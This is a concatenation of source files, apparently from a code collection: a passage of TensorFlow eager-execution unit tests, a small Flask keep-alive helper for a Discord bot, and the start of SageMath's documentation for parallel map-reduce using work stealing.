# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
@test_util.disable_eager_op_as_function('b/206994108')
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op on CPU and copy the result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
@test_util.with_eager_op_as_function
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
with ops.device(self.cpu_device):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
keep_alive.py
|
#***************************************************************************#
# #
# MCDramaBot - A Discord Bot That Causes Drama #
# https://github.com/CrankySupertoon/MCDramaBot #
# Copyright (C) 2020 CrankySupertoon. All rights reserved.                  #
# #
# License: #
# MIT License https://www.mit.edu/~amini/LICENSE.md #
# #
#***************************************************************************#
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I am not dead."
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
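# A minimal usage sketch (a hypothetical bot script, not part of this file):
# calling keep_alive() before starting the Discord client spawns the Flask
# thread on port 8080, so the hosting platform sees regular HTTP activity and
# does not idle the process. `discord` and `MY_TOKEN` below are assumptions
# used purely for illustration.
#
#     from keep_alive import keep_alive
#     import discord
#
#     client = discord.Client()
#     keep_alive()          # web thread starts answering "I am not dead."
#     client.run(MY_TOKEN)  # blocks while the bot runs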
|
map_reduce.py
|
# -*- coding: utf-8 -*-
r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet_forest`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce?
-------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet_forest`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need to set the environment variable ``SAGE_NUM_THREADS`` to the
desired number of parallel threads to be used::
sage: import os # not tested
sage: os.environ["SAGE_NUM_THREADS"] = '8' # not tested
Second, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet_forest` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.sets.recursively_enumerated_set.RecursivelyEnumeratedSet_forest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet_forest`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce their work
locally or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=float(0.01))
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for an example of consumer use.
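For instance, the binary-word count from :ref:`basic-usage` can be run with
local reduction turned off; the result is unchanged, only the communication
pattern differs (a sketch to be run inside Sage)::

    from sage.parallel.map_reduce import RESetMapReduce

    S = RESetMapReduce(
        roots=[[]],
        children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
        map_function=lambda x: 1,
        reduce_function=lambda x, y: x + y,
        reduce_init=0)
    S.run(reduce_locally=False)      # still returns 131071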
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
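To see progress messages on the console, one can raise the logger's level at
run time, for example (a short sketch using the standard :mod:`logging`
module)::

    import logging
    from sage.parallel.map_reduce import logger

    logger.setLevel(logging.INFO)    # or logging.DEBUG for very verbose output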
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work?
------------------
The scheduling algorithm we use here is an adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...] Each
work item is initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map-reduce instance works on a :class:`RecursivelyEnumeratedSet_forest`
called here `C` and is coordinated by a :class:`RESetMapReduce` object called the
**master**. The master is in charge of launching the work, gathering the results
and cleaning up at the end of the computation. It performs neither the generation
of the elements of `C` nor the computation of the mapped function. It does,
however, occasionally perform a reduce, though by default most of the reducing is
done by the workers. Also, thanks to the work-stealing algorithm, the master is
only involved in detecting the termination of the computation; all the load
balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker, that is, its position in
the master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing the nodes assigned
to the worker. It is used as a stack by the worker; thieves steal from the
bottom of this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfer nodes during a steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal operation, that is, when all workers are active, a worker ``W``
iterates through a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from,
and newly generated nodes are appended to, ``W._todo``. When a worker ``W``
runs out of work, that is, when ``W._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method; a schematic sketch of this theft
loop is given after the list below.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
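Here is a deliberately simplified, self-contained sketch of this theft loop.
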